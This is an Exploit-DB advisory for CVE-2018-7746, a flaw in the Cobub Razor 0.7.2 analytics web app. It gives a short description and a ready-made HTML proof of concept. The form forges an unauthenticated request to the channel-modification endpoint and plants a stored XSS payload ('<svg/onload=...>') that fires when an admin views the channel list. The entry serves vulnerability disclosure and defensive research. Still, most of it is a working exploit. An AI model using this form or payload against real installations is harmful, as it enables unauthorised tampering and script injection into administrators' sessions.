Cobub Razor 0.7.2 - Cross Site Request Forgery

EDB-ID: 44416
Author: ppb
Published: 2018-04-06
CVE: CVE-2018-7746
Type: Webapps
Platform: PHP
Vulnerable App: N/A 

 # Date: [2018-03-07] 
 # Exploit Author: [ppb([email protected])] 
 # Vendor Homepage: [https://github.com/cobub/razor/] 
 # Software Link: [https://github.com/cobub/razor/] 
 # Version: [0.72]  
 # CVE : [CVE-2018-7746] 
  
 There is a vulnerability. Authentication is not required for /index.php?/manage/channel/modifychannel. For example, with a crafted channel name, stored XSS is triggered during a later /index.php?/manage/channel request by an admin. 
  
  
 <html> 
   <body> 
   <script>history.pushState('', '', '/')</script> 
     <form action="http://127.0.0.1/index.php?/manage/channel/modifychannel" method="POST"> 
       <input type="hidden" name="channel_id" value="979" /> 
       <input type="hidden" name="channel_name" value="xss><svg/onload=alert(1)>" /> 
       <input type="hidden" name="platform" value="1" /> 
       <input type="submit" value="Submit request" /> 
     </form> 
   </body> 
 </html>

Source: www.exploit-db.com
Related Posts